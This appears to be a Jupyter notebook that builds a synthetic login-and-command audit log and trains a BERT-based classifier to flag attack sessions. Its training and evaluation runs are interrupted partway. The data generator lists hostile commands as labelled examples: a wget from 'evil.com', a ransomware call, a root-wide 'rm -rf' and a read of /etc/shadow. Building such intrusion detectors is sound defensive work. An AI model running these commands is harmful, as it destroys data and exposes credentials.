In [None]:
!pip install transformers
!pip install scikit-learn
!pip install torch



In [1]:
from tqdm import tqdm
from pathlib import Path
from datetime import datetime, timedelta
import numpy as np
import pandas as pd
import random
from sklearn.model_selection import train_test_split
print("[INF] base loaded")
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import TensorDataset, DataLoader
print("[INF] torch loaded")
from transformers import BertTokenizer, BertModel
print("[INF] transformers loaded")

device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(f"Selected device type: {device}")

[INF] base loaded
[INF] torch loaded


  from .autonotebook import tqdm as notebook_tqdm


[INF] transformers loaded
Selected device type: cpu


In [2]:
def generate_hard_mode_dataset(filename="audit_hard.log", num_sessions=20000):
    print(f"Generowanie TRUDNEGO zbioru danych ({num_sessions} sesji)...")

    logs = []
    current_time = datetime(2025, 1, 1, 8, 0, 0)

    users = ['root', 'admin', 'user', 'postgres', 'deploy', 'guest']

    cmds_safe = ['echo "hello"', 'date', 'whoami', 'pwd']

    cmds_ambiguous = [
        'ls -la',
        'cd /var/www',
        'ps aux',
        'netstat -tuln',
        'cat /etc/passwd',
        'curl google.com',
        'tar -czf backup.tar'
    ]

    cmds_malware = [
        'wget http://evil.com/bot',
        './ransomware',
        'rm -rf --no-preserve-root /',
        'cat /etc/shadow'
    ]

    for i in range(num_sessions):
        session_id = f"SESS_{i:06d}"
        current_time += timedelta(seconds=random.randint(1, 120))
        sess_time = current_time

        is_attack = random.random() > 0.70

        user = random.choice(users)

        if not is_attack:
            # 1.Admin forgot password -> NORMAL
            if random.random() < 0.1:
                fails = random.randint(3, 8)
                for _ in range(fails):
                    sess_time += timedelta(seconds=2)
                    logs.append(f"{sess_time.isoformat()}Z {session_id} login attempt [{user}/fail] failed;normal")
                sess_time += timedelta(seconds=2)
                logs.append(f"{sess_time.isoformat()}Z {session_id} login attempt [{user}/pass] succeeded;normal")

            # 2.NORMAL
            else:
                logs.append(f"{sess_time.isoformat()}Z {session_id} login attempt [{user}/pass] succeeded;normal")

        else:
            # 3. ATTACK KNEW PASSOWRD STRANGE ACTIVITY
            if random.random() < 0.4:
                logs.append(f"{sess_time.isoformat()}Z {session_id} login attempt [{user}/stolen] succeeded;attack")

            # Brute force
            else:
                fails = random.randint(5, 20)
                for _ in range(fails):
                    sess_time += timedelta(milliseconds=random.randint(100, 800))
                    logs.append(f"{sess_time.isoformat()}Z {session_id} login attempt [{user}/brute] failed;attack")
                if random.random() < 0.2:
                    logs.append(f"{sess_time.isoformat()}Z {session_id} login attempt [{user}/guess] succeeded;attack")
                else:
                    continue

        #COMMANDS
        num_cmds = random.randint(2, 10)

        for _ in range(num_cmds):
            sess_time += timedelta(seconds=random.randint(2, 15))
            #NORMAL
            if not is_attack:
                if random.random() < 0.2:
                    cmd = 'curl -O http://company.com/script.sh'
                else:
                    cmd = random.choice(cmds_safe + cmds_ambiguous)

                logs.append(f"{sess_time.isoformat()}Z {session_id} CMD: {cmd};normal")

            else:
                # ATAK:
                if random.random() < 0.3:
                    cmd = random.choice(cmds_malware)
                else:
                    cmd = random.choice(cmds_ambiguous)

                logs.append(f"{sess_time.isoformat()}Z {session_id} CMD: {cmd};attack")

    with open(filename, "w", encoding="utf-8") as f:
        f.write("\n".join(logs))

def load_log_content(file_name: str) -> str:
    file_path = Path(file_name)
    return file_path.read_text(encoding='utf-8')

def pars_logs_content(log_content: str) -> pd.DataFrame:
    lines = (line.strip() for line in log_content.split('\n') if line.strip())

    data = []
    for line in lines:
        time, session_id, action_type, rest = line.split(' ', 3)
        action, status = rest.rsplit(';', 1)

        try:
            time = datetime.strptime(time ,"%Y-%m-%dT%H:%M:%SZ")
        except ValueError:
            time = datetime.strptime(time ,"%Y-%m-%dT%H:%M:%S.%fZ")

        data.append((time, session_id, action_type, action, status))

    df = pd.DataFrame(data, columns=["timestamp", "session_id", "action_type", "action", "status"])

    df["prev_session_id"] = df["session_id"].shift()
    df["prev_timestamp"] = df["timestamp"].shift()
    df["delta_time"] = df["timestamp"] - df["prev_timestamp"]
    df.loc[df["session_id"] != df["prev_session_id"], "delta_time"] = timedelta.max
    df["delta"] = df["delta_time"].apply(lambda x: x.total_seconds() if x != timedelta.max else np.inf)
    df["delta_type"] = np.where(df["delta"] < 1, "short", "long")
    df = df.drop(columns=["prev_session_id", "prev_timestamp", "delta_time", "delta"])

    df["session_id"] = pd.to_numeric(df["session_id"].str.replace("SESS_", ""), errors="coerce")
    df["result"] = (df["status"] == "attack").astype(int)
    df = df.drop(columns=["timestamp", "status"])

    df["target"] = (df["session_id"].astype(str)
        + " " + df["delta_type"]
        + " " + df["action_type"]
        + " " + df["action"])
    df = df.drop(columns=["session_id", "delta_type", "action_type", "action"])

    return df


In [3]:
# generate_hard_mode_dataset()

print("[INF] parsing hard dataset...")

csv_path = "audit_hard.log"
df = pars_logs_content(load_log_content(csv_path))

X_data = df["target"].to_list()
y_data = df["result"]

[INF] parsing hard dataset...


  df.loc[df["session_id"] != df["prev_session_id"], "delta_time"] = timedelta.max


In [4]:
print("[INF] creating tokenizer...")
tokenizer = BertTokenizer.from_pretrained("bert-base-uncased")
bertModel = BertModel.from_pretrained("bert-base-uncased")
bertModel.eval()
bertModel.to(device)

[INF] creating tokenizer...


BertModel(
  (embeddings): BertEmbeddings(
    (word_embeddings): Embedding(30522, 768, padding_idx=0)
    (position_embeddings): Embedding(512, 768)
    (token_type_embeddings): Embedding(2, 768)
    (LayerNorm): LayerNorm((768,), eps=1e-12, elementwise_affine=True)
    (dropout): Dropout(p=0.1, inplace=False)
  )
  (encoder): BertEncoder(
    (layer): ModuleList(
      (0-11): 12 x BertLayer(
        (attention): BertAttention(
          (self): BertSdpaSelfAttention(
            (query): Linear(in_features=768, out_features=768, bias=True)
            (key): Linear(in_features=768, out_features=768, bias=True)
            (value): Linear(in_features=768, out_features=768, bias=True)
            (dropout): Dropout(p=0.1, inplace=False)
          )
          (output): BertSelfOutput(
            (dense): Linear(in_features=768, out_features=768, bias=True)
            (LayerNorm): LayerNorm((768,), eps=1e-12, elementwise_affine=True)
            (dropout): Dropout(p=0.1, inplace=False

In [5]:
def bert_embeddings(texts):
    max_length = len(max(X_data, key=len))
    with torch.no_grad():
        inputs = tokenizer(texts, return_tensors='pt', truncation=True, max_length=max_length, padding='max_length')
        tokenized_texts = inputs["input_ids"].cpu()
        attention_mask = inputs["attention_mask"].cpu()
        return tokenized_texts, attention_mask

print("[INF] Creating tokenized inputs...")
tokenized_texts, attention_mask = bert_embeddings(X_data)

X_train, X_test, mask_train, mask_test, y_train, y_test = train_test_split(
    tokenized_texts,
    attention_mask,
    y_data,
    test_size=0.2,
    random_state=42,
    stratify=y_data
)


[INF] Creating tokenized inputs...


In [6]:
class SimpleTransformer(nn.Module):
    def __init__(self, vocab_size, d_model=128):
        super().__init__()

        # self.embedding = nn.Embedding(
        #     vocab_size,
        #     d_model,
        #     padding_idx=tokenizer.pad_token_id
        # )

        encoder_layer = nn.TransformerEncoderLayer(
            d_model=d_model,
            nhead=4,
            dim_feedforward=256,
            batch_first=True
        )

        self.encoder = nn.TransformerEncoder(
            encoder_layer,
            num_layers=2
        )

        self.classifier = nn.Linear(d_model, len(pd.unique(y_data)))

    def forward(self, input_ids, attention_mask):
        pad_mask = (attention_mask == 0).to(device)

        output_ids = bertModel(input_ids, attention_mask)
        x = output_ids.last_hidden_state.squeeze().cpu().to(device)
        # x = output_ids.last_hidden_state[:, 0, :].squeeze().cpu()

        # x = self.embedding(input_ids)
        x = self.encoder(x, src_key_padding_mask=pad_mask)

        attention_mask_unsqueeze = attention_mask.unsqueeze(-1)
        x = (x * attention_mask_unsqueeze).sum(dim=1) / attention_mask_unsqueeze.sum(dim=1)

        pred = self.classifier(x)
        del x, pad_mask
        return pred

model = SimpleTransformer(vocab_size=tokenizer.vocab_size, d_model=768)
model.to(device)

optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
loss_fn = nn.CrossEntropyLoss()

In [8]:
for epoch in range(10):
    model.train()
    optimizer.zero_grad()

    # train_ds = TensorDataset(
    #     X_train.to(device),
    #     mask_train.to(device),
    #     torch.tensor(y_train.values).to(device))
    train_ds = TensorDataset(
        X_train,
        mask_train,
        torch.tensor(y_train.values))
    train_loader = DataLoader(train_ds, batch_size=8, shuffle=True)

    its = 1
    total_loss = 0
    for x, mask, y in tqdm(train_loader, desc=f"{total_loss/its:0.4f}"):
        x = x.to(device)
        mask = mask.to(device)
        y = y.to(device)

        logits = model(x, mask)
        loss = loss_fn(logits, y)

        del x, mask, y

        optimizer.zero_grad()
        loss.backward()
        optimizer.step()

        total_loss += loss.item()
        its += 1

    print(f"Epoch {epoch+1} | Loss: {total_loss / len(train_loader):.4f}")


0.0000:   0%|          | 0/17239 [00:00<?, ?it/s]

0.0000:   2%|▏         | 267/17239 [06:26<6:49:05,  1.45s/it]


KeyboardInterrupt: 

In [None]:
torch.cuda.empty_cache()

In [9]:
model.eval()
test_ds = TensorDataset(
    X_test,
    mask_test,
    torch.tensor(y_test.values))
test_loader = DataLoader(test_ds, batch_size=64, shuffle=True)
total_acc = 0.0
with torch.no_grad():
    for x, mask, y in tqdm(test_loader):
        X_test_device = x.to(device)
        mask_test_device = mask.to(device)
        preds = model(X_test_device, mask_test_device).argmax(dim=1)
        acc = np.sum((preds.cpu() == y).numpy()) / len(y)
        # acc = (preds.cpu() == y_test).float().mean()
        del X_test_device, mask_test_device

        print(acc)
        total_acc += acc

print()
print("Test accuracy:", total_acc / len(test_loader))


  output = torch._nested_tensor_from_mask(
  0%|          | 1/539 [00:02<26:50,  2.99s/it]

0.90625


  0%|          | 2/539 [00:05<25:41,  2.87s/it]

0.875


  1%|          | 3/539 [00:08<24:48,  2.78s/it]

0.96875


  1%|          | 4/539 [00:11<26:46,  3.00s/it]

0.90625


  1%|          | 5/539 [00:15<28:21,  3.19s/it]

0.90625


  1%|          | 6/539 [00:18<27:33,  3.10s/it]

0.890625


  1%|▏         | 7/539 [00:21<27:00,  3.05s/it]

0.890625


  1%|▏         | 8/539 [00:24<26:34,  3.00s/it]

0.859375


  2%|▏         | 9/539 [00:26<26:12,  2.97s/it]

0.859375


  2%|▏         | 10/539 [00:29<25:34,  2.90s/it]

0.96875


  2%|▏         | 11/539 [00:33<27:10,  3.09s/it]

0.96875


  2%|▏         | 12/539 [00:36<27:46,  3.16s/it]

0.890625


  2%|▏         | 13/539 [00:40<28:27,  3.25s/it]

0.921875


  3%|▎         | 14/539 [00:43<28:22,  3.24s/it]

0.9375


  3%|▎         | 15/539 [00:45<26:57,  3.09s/it]

0.984375


  3%|▎         | 16/539 [00:48<25:49,  2.96s/it]

0.90625


  3%|▎         | 17/539 [00:52<26:54,  3.09s/it]

0.921875


  3%|▎         | 18/539 [00:55<26:44,  3.08s/it]

0.890625


  4%|▎         | 19/539 [00:58<27:32,  3.18s/it]

0.890625


  4%|▎         | 20/539 [01:01<27:07,  3.13s/it]

0.828125


  4%|▍         | 21/539 [01:04<27:32,  3.19s/it]

0.953125


  4%|▍         | 22/539 [01:08<28:44,  3.34s/it]

0.84375


  4%|▍         | 23/539 [01:11<27:17,  3.17s/it]

0.9375


  4%|▍         | 24/539 [01:14<26:33,  3.09s/it]

0.859375


  5%|▍         | 25/539 [01:16<25:40,  3.00s/it]

0.828125


  5%|▍         | 26/539 [01:20<27:09,  3.18s/it]

0.90625


  5%|▌         | 27/539 [01:23<25:45,  3.02s/it]

0.90625


  5%|▌         | 28/539 [01:25<24:59,  2.93s/it]

0.921875


  5%|▌         | 29/539 [01:28<24:48,  2.92s/it]

0.921875


  6%|▌         | 30/539 [01:31<24:01,  2.83s/it]

0.984375


  6%|▌         | 31/539 [01:34<23:27,  2.77s/it]

0.96875


  6%|▌         | 32/539 [01:36<23:07,  2.74s/it]

0.875


  6%|▌         | 33/539 [01:39<23:03,  2.73s/it]

0.90625


  6%|▋         | 34/539 [01:42<23:24,  2.78s/it]

0.953125


  6%|▋         | 35/539 [01:45<23:49,  2.84s/it]

0.9375


  7%|▋         | 36/539 [01:49<25:52,  3.09s/it]

0.90625


  7%|▋         | 37/539 [01:52<26:04,  3.12s/it]

0.9375


  7%|▋         | 38/539 [01:55<27:29,  3.29s/it]

0.96875


  7%|▋         | 39/539 [01:59<27:15,  3.27s/it]

0.921875


  7%|▋         | 40/539 [02:02<26:30,  3.19s/it]

0.953125


  7%|▋         | 40/539 [02:03<25:46,  3.10s/it]


KeyboardInterrupt: 